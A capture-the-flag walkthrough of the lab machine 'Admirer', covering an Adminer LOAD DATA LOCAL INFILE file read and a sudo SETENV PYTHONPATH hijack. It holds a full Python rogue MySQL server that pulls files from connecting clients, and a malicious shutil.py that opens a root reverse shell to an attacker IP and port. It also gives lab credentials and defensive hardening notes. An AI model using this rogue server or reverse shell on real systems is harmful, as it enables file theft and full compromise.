- # Nmap 7.80 scan initiated Sat May 2 17:43:44 2020 as: nmap -sC -sV -oN nmap/admirer 10.10.10.187
- Nmap scan report for 10.10.10.187
- Host is up (0.26s latency).
- Not shown: 997 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 3.0.3
- 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
- | ssh-hostkey:
- | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
- | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
- |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
- 80/tcp open http Apache httpd 2.4.25 ((Debian))
- | http-robots.txt: 1 disallowed entry
- |_/admin-dir
- |_http-server-header: Apache/2.4.25 (Debian)
- |_http-title: Admirer
- Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- # Nmap done at Sat May 2 17:44:20 2020 -- 1 IP address (1 host up) scanned in 35.61 seconds
- Running gobuster didn't reveal much, but before that I had already opened http://10.10.10.187/robots.txt, which contains:
- User-agent: *
- # This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
- Disallow: /admin-dir
- Following waldo's hint, I downloaded http://10.10.10.187/admin-dir/contacts.txt and http://10.10.10.187/admin-dir/credentials.txt; the latter reveals the FTP credentials:
- ftpuser
- %n?4Wz}R$tTF7
- Using those credentials on FTP I downloaded html.tar.gz and dump.sql.
- Looking through the HTML dump, I saw something interesting in utility-scripts/db_admin.php: hard-coded MySQL credentials for waldo.
- <?php
- $servername = "localhost";
- $username = "waldo";
- $password = "Wh3r3_1s_w4ld0?";
- // Create connection
- $conn = new mysqli($servername, $username, $password);
- // Check connection
- if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
- }
- echo "Connected successfully";
- // TODO: Finish implementing this or find a better open source alternative
- ?>
- admin_tasks.php also has this dispatcher, where $task comes from the request:
- <?php
- if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
- $task == '5' || $task == '6' || $task == '7')
- {
- echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
- }
- else
- {
- echo("Invalid task.");
- }
- ?>
- After a lot of playing around I was unable to bypass the if condition: the comparison is loose (==), but the only extra values it admits are numeric strings such as "01" or "1.0", which contain nothing but digits, sign, dot, exponent and whitespace, so there is nothing to inject into shell_exec.
- So I tried all the passwords I already had over SSH with every username I knew, and then found
- http://10.10.10.187/utility-scripts/adminer.php
- Reading a blog post showed that Adminer will log in to any MySQL server, including one hosted on my own machine, and that the MySQL client on the web server then reads local files for LOAD DATA LOCAL INFILE, because in this protocol the server tells the client which file to send.
- Dumping the file into a table (query issued through Adminer while logged in to the MySQL server on my machine; the table has to exist there beforehand, that server's local_infile setting must be on, and the mysqli client on the web server must allow local infile, which it did here):
- load data local infile '../index.php'
- into table data
- fields terminated by "\n"
- The path is relative to the web server's working directory (utility-scripts/), so this pulls /var/www/html/index.php into the table, and index.php contains the DB password &<h5b~yK3F#{PaPB&dA}{H>
- That DB password also works over SSH for the user waldo, which gives a user shell,
- and we have user.txt.
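The writeup logs Adminer in to a real MySQL server on the attacker's host and types the LOAD DATA LOCAL INFILE query by hand. The same file read works with no real MySQL at all, because in this protocol it is the server that names the file the client must send: after any COM_QUERY the server may answer with a LOCAL INFILE request, and the client (mysqli inside Adminer, on the web server) uploads that file. The rogue server below is an added example, not code from the writeup or from Adminer. The version string, salt and port are arbitrary, the file path is whatever is passed on the command line, and it assumes the connecting client sets CLIENT_LOCAL_FILES (it warns on stderr if not).

```python
import io
import socket
import struct
import sys

# MySQL capability flags (subset, named as in the protocol documentation)
CLIENT_LONG_PASSWORD = 0x0001
CLIENT_LOCAL_FILES = 0x0080        # client is willing to serve LOAD DATA LOCAL
CLIENT_PROTOCOL_41 = 0x0200
CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x00080000
SERVER_CAPS = (CLIENT_LONG_PASSWORD | CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41
               | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)


def mysql_packet(payload: bytes, seq: int) -> bytes:
    """Frame a payload: 3-byte little-endian length, then a 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def handshake_v10(version: bytes = b"5.7.29-rogue", salt: bytes = b"A" * 20) -> bytes:
    """Initial server greeting (Protocol::HandshakeV10), sequence id 0."""
    payload = (
        b"\x0a" + version + b"\x00"              # protocol 10, NUL-terminated version
        + struct.pack("<I", 1)                    # connection id
        + salt[:8] + b"\x00"                      # auth-plugin-data part 1, filler
        + struct.pack("<H", SERVER_CAPS & 0xFFFF)
        + b"\x21"                                 # charset utf8_general_ci
        + struct.pack("<H", 0x0002)               # status: SERVER_STATUS_AUTOCOMMIT
        + struct.pack("<H", SERVER_CAPS >> 16)
        + bytes([len(salt) + 1])                  # auth-plugin-data length incl. NUL
        + b"\x00" * 10                            # reserved
        + salt[8:] + b"\x00"                      # auth-plugin-data part 2 (13 bytes)
        + b"mysql_native_password\x00"
    )
    return mysql_packet(payload, 0)


def ok_packet(seq: int) -> bytes:
    """OK_Packet: header 0x00, affected rows 0, insert id 0, status, warnings."""
    return mysql_packet(b"\x00\x00\x00\x02\x00\x00\x00", seq)


def local_infile_request(path: str, seq: int) -> bytes:
    """Reply to COM_QUERY that tells the client to send us a local file."""
    return mysql_packet(b"\xfb" + path.encode(), seq)


def client_allows_local_infile(handshake_response: bytes) -> bool:
    """The first 4 bytes of HandshakeResponse41 are the client's capability flags."""
    return bool(struct.unpack("<I", handshake_response[:4])[0] & CLIENT_LOCAL_FILES)


def recv_exact(recv, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def read_packet(recv):
    """Return (sequence id, payload) of the next packet from a recv(n) callable."""
    header = recv_exact(recv, 4)
    return header[3], recv_exact(recv, header[0] | header[1] << 8 | header[2] << 16)


def collect_file(recv):
    """Gather the file-content packets the client sends; an empty packet ends them."""
    data = b""
    while True:
        seq, payload = read_packet(recv)
        if not payload:
            return data, seq
        data += payload


def recv_from_bytes(data: bytes):
    """recv(n) over an in-memory byte string (constructed input for offline use)."""
    return io.BytesIO(data).read


def serve_once(bind: str, port: int, target_path: str) -> bytes:
    """Accept one client, 'log it in', and turn its first query into a file read."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            conn.sendall(handshake_v10())
            _, response = read_packet(conn.recv)     # credentials: accept anything
            if not client_allows_local_infile(response):
                print(f"[!] {peer[0]} did not set CLIENT_LOCAL_FILES", file=sys.stderr)
            conn.sendall(ok_packet(2))
            while True:                              # wait for the first COM_QUERY
                seq, cmd = read_packet(conn.recv)
                if cmd[:1] == b"\x03":
                    break
                conn.sendall(ok_packet(seq + 1))     # COM_INIT_DB, COM_PING, ...
            conn.sendall(local_infile_request(target_path, seq + 1))
            data, last_seq = collect_file(conn.recv)
            conn.sendall(ok_packet(last_seq + 1))    # pretend the load succeeded
            return data


if __name__ == "__main__":
    # usage: python3 rogue_mysql.py ../index.php   (then log in from Adminer)
    sys.stdout.buffer.write(serve_once("0.0.0.0", 3306, sys.argv[1]))
```

Point Adminer at this host with any username and password; whatever query Adminer issues first after login is answered with the file request, and the file lands on stdout. The defensive reading is the same as the offensive one: a MySQL client that connects to an untrusted server with local infile enabled is a file-read primitive, so Adminer-style tools should not be reachable with an attacker-chosen server, and mysqli.allow_local_infile should stay off unless it is needed.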
- Privilege Escalation
- Running sudo -l
- Matching Defaults entries for waldo on admirer:
- env_reset, env_file=/etc/sudoenv, mail_badpass,
- secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
- User waldo may run the following commands on admirer:
- (ALL) SETENV: /opt/scripts/admin_tasks.sh
- So we can run /opt/scripts/admin_tasks.sh as root, and the SETENV tag means sudo accepts environment variables we set on the command line (or pass with -E) even though env_reset is in effect. Reading the script:
- #!/bin/bash
- view_uptime()
- {
- /usr/bin/uptime -p
- }
- view_users()
- {
- /usr/bin/w
- }
- view_crontab()
- {
- /usr/bin/crontab -l
- }
- backup_passwd()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Backing up /etc/passwd to /var/backups/passwd.bak..."
- /bin/cp /etc/passwd /var/backups/passwd.bak
- /bin/chown root:root /var/backups/passwd.bak
- /bin/chmod 600 /var/backups/passwd.bak
- echo "Done."
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- backup_shadow()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Backing up /etc/shadow to /var/backups/shadow.bak..."
- /bin/cp /etc/shadow /var/backups/shadow.bak
- /bin/chown root:shadow /var/backups/shadow.bak
- /bin/chmod 600 /var/backups/shadow.bak
- echo "Done."
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- backup_web()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Running backup script in the background, it might take a while..."
- /opt/scripts/backup.py &
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- backup_db()
- {
- if [ "$EUID" -eq 0 ]
- then
- echo "Running mysqldump in the background, it may take a while..."
- #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql &
- /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql &
- else
- echo "Insufficient privileges to perform the selected operation."
- fi
- }
- # Non-interactive way, to be used by the web interface
- if [ $# -eq 1 ]
- then
- option=$1
- case $option in
- 1) view_uptime ;;
- 2) view_users ;;
- 3) view_crontab ;;
- 4) backup_passwd ;;
- 5) backup_shadow ;;
- 6) backup_web ;;
- 7) backup_db ;;
- *) echo "Unknown option." >&2
- esac
- exit 0
- fi
- # Interactive way, to be called from the command line
- options=("View system uptime"
- "View logged in users"
- "View crontab"
- "Backup passwd file"
- "Backup shadow file"
- "Backup web data"
- "Backup DB"
- "Quit")
- echo
- echo "[[[ System Administration Menu ]]]"
- PS3="Choose an option: "
- COLUMNS=11
- select opt in "${options[@]}"; do
- case $REPLY in
- 1) view_uptime ; break ;;
- 2) view_users ; break ;;
- 3) view_crontab ; break ;;
- 4) backup_passwd ; break ;;
- 5) backup_shadow ; break ;;
- 6) backup_web ; break ;;
- 7) backup_db ; break ;;
- 8) echo "Bye!" ; break ;;
- *) echo "Unknown option." >&2
- esac
- done
- exit 0
- Looking at the backup_web function (option 6): it runs /opt/scripts/backup.py in the background, and under sudo the EUID check passes, so the script runs as root.
- The Python script is:
- #!/usr/bin/python3
- from shutil import make_archive
- src = '/var/www/html/'
- # old ftp directory, not used anymore
- #dst = '/srv/ftp/html'
- dst = '/var/backups/html'
- make_archive(dst, 'gztar', src)
- Since we have SETENV we can do a PYTHONPATH hijack: backup.py does "from shutil import make_archive", and directories listed in PYTHONPATH are searched before the standard library, so a shutil.py of our own in a directory we control is imported instead of the real module, and whatever it does at import time runs as root.
- Create a file named shutil.py containing:
- import os
- import pty
- import socket
- # attacker's listener; change to your own address and port
- lhost = "10.10.14.174"
- lport = 4444
- # leftovers that backup.py never touches (it only imports make_archive); harmless
- ZIP_DEFLATED = 0
- class ZipFile:
-     def close(*args):
-         return
-     def write(*args):
-         return
-     def __init__(self, *args):
-         return
- # everything below runs at import time, i.e. the moment root's backup.py
- # executes "from shutil import make_archive" with this file first on PYTHONPATH
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((lhost, lport))
- os.dup2(s.fileno(), 0)   # stdin, stdout and stderr of the shell go to the socket
- os.dup2(s.fileno(), 1)
- os.dup2(s.fileno(), 2)
- os.putenv("HISTFILE", '/dev/null')
- pty.spawn("/bin/bash")
- s.close()
- Start a listener (nc -lvnp 4444) and, from the directory holding shutil.py, run
- sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
- and we have root now :) (Once the shell exits, the import fails because our shutil.py defines no make_archive; by then it no longer matters.)
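The hijack works because Python puts every PYTHONPATH entry ahead of the standard library on sys.path, and sudo's SETENV tag lets that variable survive env_reset. The following is an added example, not code from the writeup, that reproduces the mechanism offline: a fake shutil.py that drops a marker file instead of spawning a reverse shell, a stand-in for backup.py with the same import line, and a run with and without python3 -I, the interpreter flag that ignores PYTHONPATH and would have defeated this escalation. The temporary paths, the marker file and the HIJACK_MARKER variable are constructed for the demo.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Stand-in for the malicious shutil.py from the writeup: instead of a reverse
# shell it writes a marker file, so the effect can be observed offline.
FAKE_SHUTIL = textwrap.dedent("""\
    import os
    with open(os.environ["HIJACK_MARKER"], "w") as f:
        f.write("hijacked by " + __file__)
    def make_archive(*args, **kwargs):   # keeps the caller's import from failing
        return None
""")

# Stand-in for /opt/scripts/backup.py: same import line, no real archiving.
VICTIM = "from shutil import make_archive\nimport shutil\nprint(shutil.__file__)\n"


def run_victim(isolated: bool) -> dict:
    """Run the victim with PYTHONPATH pointing at a directory holding a fake shutil.py.

    isolated=True adds -I, which makes the interpreter ignore PYTHONPATH (and
    drop the script's directory from sys.path): the hardening a script launched
    through sudo should have had.
    """
    with tempfile.TemporaryDirectory() as tmp:
        hijack_dir = os.path.join(tmp, "hijack")      # attacker-writable directory
        os.mkdir(hijack_dir)
        with open(os.path.join(hijack_dir, "shutil.py"), "w") as f:
            f.write(FAKE_SHUTIL)
        victim = os.path.join(tmp, "backup.py")
        with open(victim, "w") as f:
            f.write(VICTIM)
        marker = os.path.join(tmp, "marker")
        # what "sudo -E PYTHONPATH=$(pwd) ..." hands to the root-run interpreter
        env = dict(os.environ, PYTHONPATH=hijack_dir, HIJACK_MARKER=marker)
        cmd = [sys.executable] + (["-I"] if isolated else []) + [victim]
        proc = subprocess.run(cmd, env=env, cwd=tmp, capture_output=True, text=True)
        return {
            "hijacked": os.path.exists(marker),
            "shutil_from_pythonpath": proc.stdout.strip().startswith(hijack_dir),
            "returncode": proc.returncode,
        }


if __name__ == "__main__":
    print("plain python3:", run_victim(isolated=False))
    print("python3 -I:   ", run_victim(isolated=True))
```

The -I flag only closes the PYTHONPATH door; the rule "(ALL) SETENV: /opt/scripts/admin_tasks.sh" still lets the caller set any other variable for a root process, so the sudoers fix is to drop SETENV (and env_reset then strips PYTHONPATH on its own).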